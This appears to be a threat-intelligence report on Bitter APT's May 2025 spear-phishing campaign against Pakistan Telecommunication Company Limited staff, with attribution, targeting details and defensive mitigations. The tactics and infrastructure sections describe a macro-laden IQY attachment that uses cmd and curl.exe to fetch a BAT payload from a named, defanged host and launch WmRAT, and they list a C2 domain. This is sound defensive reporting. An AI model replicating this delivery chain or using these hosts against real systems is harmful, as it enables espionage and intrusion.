Full Report
Executive Summary On May 7, 2025, during the active military escalation between Pakistan and India—specifically in the context of India's military campaign 'Operation Sindoor'—, EclecticIQ analysts observed that Bitter APT (also known as TA397) [1] very likely targeted the Pakistan Telecommunication Company Limited (PTCL) workers [2] in a spear phishing campaign very likely to deliver malware. Analysts assess that, Bitter APT is very likely a South Asian state-sponsored actor, conducting cyber-enable espionage operations by stealing state and trade secrets.
Analysis Summary
# Threat Actor: Bitter APT (TA397)
## Attribution & Identity
* **Identification:** Bitter APT (also known as TA397).
* **Attribution:** Very likely a South Asian state-sponsored actor.
## Activity Summary
In May 2025, during the active military escalation between Pakistan and India ('Operation Sindoor'), Bitter APT targeted workers at the Pakistan Telecommunication Company Limited (PTCL) using a spear-phishing campaign intended to deliver malware. This specific campaign was facilitated by using very likely stolen email credentials from Pakistan’s Counter Terrorism Department (CTD). The timing aligns with the actor's established pattern of strategic intelligence gathering during regional conflict.
## Tactics, Techniques & Procedures
* **Initial Access:** Utilized **stolen email credentials** (specifically from a CTD account) obtained via a compromise involving an infostealer variant (StealC).
* **Spear Phishing:** Deployed a spear-phishing email crafted from the compromised CTD account.
* **Delivery Mechanism:** Used an **Internet Query (IQY) attachment** ("Security Brief Report.iqy") containing a malicious **Excel macro** to evade detection.
* **Execution:** The macro used the Windows `cmd` to download and execute a subsequent payload.
* **Payload Delivery/Execution Chain:** Executed a command line sequence leveraging `curl.exe` to download a malicious BAT script from `fogomyart[.]com/random.php`, which subsequently executed a variant of **WmRAT**.
* **Persistence/Infostealing Precursor:** Actors previously infected the CTD machine with a **StealC infostealer variant** after the user downloaded "cracked" software, leading to the credential harvesting observed in August 2024.
## Targeting
* **Sectors:** Telecommunications, Law Enforcement/Government (as the source of initial compromise).
* **Geography:** Pakistan (Targeting PTCL and CTD infrastructure).
* **Victims:** Pakistan Telecommunication Company Limited (PTCL) workers, specifically targeting personnel in critical roles: 5G infrastructure engineers, DevOps specialists, project managers, and satellite communication experts.
## Tools & Infrastructure
* **Malware Families Used:** WmRAT variant, StealC infostealer variant.
* **Infrastructure (C2):** A command and control domain previously linked to Bitter APT: `tradesmarkets[.]greenadelhouse[.]com` (resolved to a known associated IP).
* **Download Host:** `fogomyart[.]com` (used to host follow-on components like a BAT script).
## Implications
Bitter APT is engaged in cyber-enabled espionage, focused specifically on stealing **state and trade secrets**. The successful compromise and subsequent abuse of a high-value victim (CTD) to pivot against another critical national entity (PTCL) during a period of heightened military conflict demonstrates their intent to gather intelligence on national infrastructure and security operations during sensitive geopolitical events.
## Mitigations
* Implement strict multi-factor authentication, especially for government and critical national infrastructure email accounts.
* Heightened vigilance regarding IQY file attachments and associated macros within email gateways and endpoints.
* Monitor for unusual use of native Windows utilities like `curl.exe` or `cmd` executing network connections, particularly from Office applications.
* Review CTD systems for evidence of prior or current StealC infections, as this indicates a successful, long-term compromise strategy leveraging lower-level infection vectors (like cracked software) to gain initial access.